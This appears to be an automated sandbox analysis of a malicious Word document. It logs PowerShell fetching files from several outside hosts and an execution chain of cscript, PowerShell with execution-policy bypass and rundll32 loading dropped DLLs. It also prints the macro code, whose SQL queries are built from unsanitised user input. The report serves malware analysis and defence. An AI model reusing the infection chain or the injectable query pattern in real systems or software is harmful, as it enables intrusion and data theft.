                                                                                              Date: Thu, 25 Nov 2021 17:39:44 GMT
                                                                                              Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                              Location: https://ghapan.com/cgi-sys/suspendedpage.cgi
                                                                                              2021-11-25 17:39:44 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.2249168136.243.74.161443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-11-25 17:39:44 UTC0OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                              Host: ghapan.com
                                                                                              2021-11-25 17:39:44 UTC1INHTTP/1.1 200 OK
                                                                                              Connection: close
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Date: Thu, 25 Nov 2021 17:39:44 GMT
                                                                                              2021-11-25 17:39:44 UTC1INData Raw: 31 64 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                                              Data Ascii: 1dbe<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                                              2021-11-25 17:39:44 UTC2INData Raw: 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a
                                                                                              Data Ascii: 193px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .status-reason { font-size: 200%; display: block;
                                                                                              2021-11-25 17:39:44 UTC8INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.2249169192.185.17.114443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-11-25 17:39:46 UTC8OUTGET /LUS1NTVui6/090921.html HTTP/1.1
                                                                                              Host: gruasingenieria.pe
                                                                                              Connection: Keep-Alive
                                                                                              2021-11-25 17:39:46 UTC8INHTTP/1.1 404 Not Found
                                                                                              Date: Thu, 25 Nov 2021 17:39:46 GMT
                                                                                              Server: Apache
                                                                                              Upgrade: h2,h2c
                                                                                              Connection: Upgrade, close
                                                                                              Last-Modified: Tue, 23 Apr 2019 06:20:01 GMT
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 746
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Type: text/html
                                                                                              2021-11-25 17:39:46 UTC8INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64
                                                                                              Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noind


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              3192.168.2.2249170210.211.111.87443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-11-25 17:39:48 UTC9OUTGET /tDzEJ8uVGwdj/130921.html HTTP/1.1
                                                                                              Host: yoowi.net
                                                                                              Connection: Keep-Alive
                                                                                              2021-11-25 17:39:49 UTC9INHTTP/1.1 200 OK
                                                                                              Connection: close
                                                                                              Set-Cookie: WEB_VERSION=desktop; expires=Fri, 24-Dec-2021 21:39:48 GMT; Max-Age=2520000; path=/; domain=yoowi.net; secure
                                                                                              Set-Cookie: real_ipd=84.17.52.63; expires=Fri, 26-Nov-2021 03:39:48 GMT; Max-Age=36000; path=/; domain=yoowi.net; secure; HttpOnly
                                                                                              Set-Cookie: ECS_ID=53cd3a70d6c8e52d7d498bf9b2f08b102d43dc77; path=/; domain=yoowi.net; secure; HttpOnly
                                                                                              Cache-control: private
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              X-Powered-By: Dev By EcshopViet.com
                                                                                              Content-Length: 1984
                                                                                              Date: Thu, 25 Nov 2021 17:39:48 GMT
                                                                                              Server: LiteSpeed
                                                                                              2021-11-25 17:39:49 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 63 73 68 6f 70 20 34 2e 30 20 43 75 73 74 6f 6d 20 62 79 20 45 63 73 68 6f 70 56 69 65 74 6e 61 6d 2e 63 6f 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63
                                                                                              Data Ascii: <!DOCTYPE html><html><head><meta name="generator" content="Ecshop 4.0 Custom by EcshopVietnam.com" /> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=1, user-sc
                                                                                              2021-11-25 17:39:49 UTC11INData Raw: 34 70 78 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 32 70 78 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 23 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 3b 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 2e 73 74 61 74 75 73 33 78 78 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 37 35 30 37 36 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 7d 0d 0a 20 20 20 20 2e 73 74 61 74 75 73 34 78 78 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 43 35 35 30 34 32 3b 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 7d 0d 0a 20 20 20 20 2e 73 74 61 74 75 73 35 78 78 20 7b
                                                                                              Data Ascii: 4px auto; padding: 12px; } #header { padding: 6px ; text-align: center; } .status3xx {background-color: #475076; color: #FFFFFF;} .status4xx {background-color: #C55042; color: #FFFFFF;} .status5xx {


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              4192.168.2.2249171143.95.80.83443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-11-25 17:39:51 UTC12OUTGET /7SEZBnhMLW/130921.html HTTP/1.1
                                                                                              Host: chaturanga.groopy.com
                                                                                              Connection: Keep-Alive
                                                                                              2021-11-25 17:39:51 UTC12INHTTP/1.1 302 Found
                                                                                              Date: Thu, 25 Nov 2021 17:39:51 GMT
                                                                                              Server: Apache
                                                                                              Location: https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi
                                                                                              Content-Length: 239
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              2021-11-25 17:39:51 UTC12INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 74 75 72 61 6e 67 61 2e 67 72 6f 6f 70 79 2e 63 6f 6d 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://chaturanga.groopy.com/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              5192.168.2.2249172143.95.80.83443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-11-25 17:39:52 UTC12OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                              Host: chaturanga.groopy.com
                                                                                              2021-11-25 17:39:52 UTC12INHTTP/1.1 200 OK
                                                                                              Date: Thu, 25 Nov 2021 17:39:52 GMT
                                                                                              Server: Apache
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: text/html
                                                                                              2021-11-25 17:39:52 UTC13INData Raw: 31 64 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                                              Data Ascii: 1dd4<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                                              2021-11-25 17:39:52 UTC20INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Start time:18:39:21
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                              Imagebase:0x13fea0000
                                                                                              File size:1423704 bytes
                                                                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:32
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cscript.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cscript.exe" C:\Users\user\AppData\Roaming\www.txt //E:VBScript //NoLogo %~f0 %*
                                                                                              Imagebase:0xff530000
                                                                                              File size:156160 bytes
                                                                                              MD5 hash:ECB021CA3370582F0C7244B0CF06732C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Start time:18:39:35
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & C:\Users\user\AppData\Roaming\www.ps1
                                                                                              Imagebase:0x13f1c0000
                                                                                              File size:473600 bytes
                                                                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:47
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www1.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:47
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www2.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:48
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www1.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:48
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www3.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:48
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www2.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:49
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www4.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:49
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www3.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:18:39:49
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c rundll32.exe C:\ProgramData\www5.dll,ldr
                                                                                              Imagebase:0x4a2b0000
                                                                                              File size:345088 bytes
                                                                                              MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:18:39:50
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www4.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:18:39:50
                                                                                              Start date:25/11/2021
                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:rundll32.exe C:\ProgramData\www5.dll,ldr
                                                                                              Imagebase:0xff550000
                                                                                              File size:45568 bytes
                                                                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Call Graph

                                                                                              Graph

                                                                                              Module: Module1

                                                                                              Declaration
                                                                                              LineContent
                                                                                              1

                                                                                              Attribute VB_Name = "Module1"

                                                                                              2

                                                                                              Option Explicit

                                                                                              3

                                                                                              Global con as ADODB.Connection

                                                                                              4

                                                                                              Global rs as ADODB.Recordset

                                                                                              Non-Executed Functions
                                                                                              APIsMeta Information

                                                                                              cboSea

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              cboSea

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              cboSea

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid1

                                                                                              StringsDecrypted Strings
                                                                                              "ID"
                                                                                              "Select * from Tbl_STUDENTS ""where ID = '"
                                                                                              "Select * from Tbl_STUDENTS ""where ID = '"
                                                                                              "Lastname"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Lastname = '"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Lastname = '"
                                                                                              "Course"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Course = '"
                                                                                              "Select * from dbo.Tbl_STUDENTS ""where Course = '"
                                                                                              LineInstructionMeta Information
                                                                                              35

                                                                                              Public Sub Search_Trans1()

                                                                                              36

                                                                                              Set rs = New ADODB.Recordset

                                                                                              37

                                                                                              If frmTrans1.cboSea.Text = "ID" Then

                                                                                              cboSea

                                                                                              38

                                                                                              rs.Open "Select * from Tbl_STUDENTS " & "where ID = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              41

                                                                                              Elseif frmTrans1.cboSea.Text = "Lastname" Then

                                                                                              cboSea

                                                                                              42

                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Lastname = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              45

                                                                                              Elseif frmTrans1.cboSea.Text = "Course" Then

                                                                                              cboSea

                                                                                              46

                                                                                              rs.Open "Select * from dbo.Tbl_STUDENTS " & "where Course = '" & frmTrans1.txtSea.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSea

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              49

                                                                                              Endif

                                                                                              50

                                                                                              Set frmTrans1.DataGrid1.DataSource = rs

                                                                                              DataGrid1

                                                                                              51

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              cboSBook

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              cboSBook

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              DataGrid4

                                                                                              StringsDecrypted Strings
                                                                                              "Call no"
                                                                                              "Select * from Tbl_BOOK ""where Call_no = '"
                                                                                              "Select * from Tbl_BOOK ""where Call_no = '"
                                                                                              "Book Name"
                                                                                              "Select * from dbo.Tbl_BOOK ""where Title = '"
                                                                                              "Select * from dbo.Tbl_BOOK ""where Title = '"
                                                                                              LineInstructionMeta Information
                                                                                              53

                                                                                              Public Sub Search_Book1()

                                                                                              54

                                                                                              Set rs = New ADODB.Recordset

                                                                                              55

                                                                                              If frmTrans1.cboSBook.Text = "Call no" Then

                                                                                              cboSBook

                                                                                              56

                                                                                              rs.Open "Select * from Tbl_BOOK " & "where Call_no = '" & frmTrans1.txtSBook & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              59

                                                                                              Elseif frmTrans1.cboSBook.Text = "Book Name" Then

                                                                                              cboSBook

                                                                                              60

                                                                                              rs.Open "Select * from dbo.Tbl_BOOK " & "where Title = '" & frmTrans1.txtSBook.Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              txtSBook

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              63

                                                                                              Endif

                                                                                              64

                                                                                              Set frmTrans1.DataGrid4.DataSource = rs

                                                                                              DataGrid4

                                                                                              65

                                                                                              End Sub

                                                                                              APIsMeta Information

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              txtCall_no

                                                                                              txtTitle

                                                                                              txtAuthor

                                                                                              txtACC

                                                                                              txtBorrow

                                                                                              txtDue

                                                                                              txtReturned

                                                                                              txtRemarks

                                                                                              StringsDecrypted Strings
                                                                                              "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='"
                                                                                              "Returned"
                                                                                              LineInstructionMeta Information
                                                                                              123

                                                                                              Public Sub Returned()

                                                                                              124

                                                                                              Set rs = New ADODB.Recordset

                                                                                              125

                                                                                              rs.Open "select * from dbo.Tbl_TRANSACTION where dbo.Tbl_TRANSACTION.ID='" & frmTrans1.Datagrid3.Columns.Item(3).Text & "'", con, adOpenStatic, adLockOptimistic

                                                                                              Open

                                                                                              Item

                                                                                              adOpenStatic

                                                                                              adLockOptimistic

                                                                                              126

                                                                                              frmTrans1.txtCall_no.Text = rs!Call_no

                                                                                              txtCall_no

                                                                                              127

                                                                                              frmTrans1.txtTitle.Text = rs!Title

                                                                                              txtTitle

                                                                                              128

                                                                                              frmTrans1.txtAuthor.Text = rs!Author

                                                                                              txtAuthor

                                                                                              129

                                                                                              frmTrans1.txtACC.Text = rs!Acc_no

                                                                                              txtACC

                                                                                              130

                                                                                              frmTrans1.txtBorrow.Text = rs!Date_Borrowed

                                                                                              txtBorrow

                                                                                              131

                                                                                              frmTrans1.txtDue.Text = rs!Date_Due

                                                                                              txtDue

                                                                                              132

                                                                                              frmTrans1.txtReturned.Text = rs!Date_Returned

                                                                                              txtReturned

                                                                                              133

                                                                                              frmTrans1.txtRemarks.Text = "Returned"

